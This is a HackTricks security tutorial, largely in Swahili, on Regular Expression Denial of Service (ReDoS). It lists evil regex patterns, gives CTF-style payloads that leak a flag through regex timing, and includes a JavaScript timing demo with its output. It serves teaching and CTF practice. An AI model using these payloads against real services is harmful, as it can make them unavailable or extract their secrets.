# Regular expression Denial of Service - ReDoS
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
# Regular Expression Denial of Service (ReDoS)
**Denial of Service ya Mifumo ya Kawaida (ReDoS)** inatokea wakati mtu anatumia udhaifu katika jinsi mifumo ya kawaida inavyofanya kazi (njia ya kutafuta na kulinganisha mifumo katika maandiko). Wakati mwingine, wakati mifumo ya kawaida inatumika, inaweza kuwa polepole sana, hasa ikiwa kipande cha maandiko wanachofanya kazi nacho kinakuwa kikubwa. Polepole hii inaweza kuwa mbaya kiasi kwamba inakua haraka sana hata kwa ongezeko dogo la ukubwa wa maandiko. Washambuliaji wanaweza kutumia tatizo hili kufanya programu inayotumia mifumo ya kawaida isifanye kazi vizuri kwa muda mrefu.
## Algorithm ya Regex ya Kawaida Inayoshughulika
**Angalia maelezo katika [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
## Regex Mbaya
Mifumo ya kawaida mbaya ni ile ambayo inaweza **kushindwa kwenye ingizo lililotengenezwa na kusababisha DoS**. Mifumo ya regex mbaya kwa kawaida ina kundi lenye kurudiwa na kurudiwa au mbadala na kuingiliana ndani ya kundi lililorejelewa. Baadhi ya mifano ya mifumo mbaya ni:
* (a+)+
* ([a-zA-Z]+)*
* (a|aa)+
* (a|a?)+
* (.*a){x} kwa x > 10
Zote hizo ni hatarini kwa ingizo `aaaaaaaaaaaaaaaaaaaaaaaa!`.
## ReDoS Payloads
### Uhamishaji wa Mstari kupitia ReDoS
Katika CTF (au bug bounty) labda unafanya **udhibiti wa Regex ambayo taarifa nyeti (bendera) inalinganishwa nayo**. Kisha, inaweza kuwa muhimu kufanya **ukurasa usimame (timeout au muda mrefu wa usindikaji)** ikiwa **Regex ililingana** na **sio ikiwa haikulingana**. Kwa njia hii utaweza **kuhamasisha** mstari **karibu na karatasi**:
* Katika [**hiki chapisho**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) unaweza kupata sheria hii ya ReDoS: `^(?=)((.*)*)*salt$`
* Mfano: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
* Katika [**hiki andiko**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) unaweza kupata hii:`(((((((.*)*)*)*)*)*)*)!`
* Katika [**hiki andiko**](https://ctftime.org/writeup/25869) alitumia: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
### Kudhibiti Ingizo na Regex ya ReDoS
Ifuatayo ni mifano ya **ReDoS** ambapo unafanya **udhibiti** wa **ingizo** na **regex**:
```javascript
function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}
// This payloads work because the input has several "a"s
[
// "((a+)+)+$", //Eternal,
// "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))
/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/
```
## Tools
* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
* [https://devina.io/redos-checker](https://devina.io/redos-checker)
## References
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Jifunze & fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}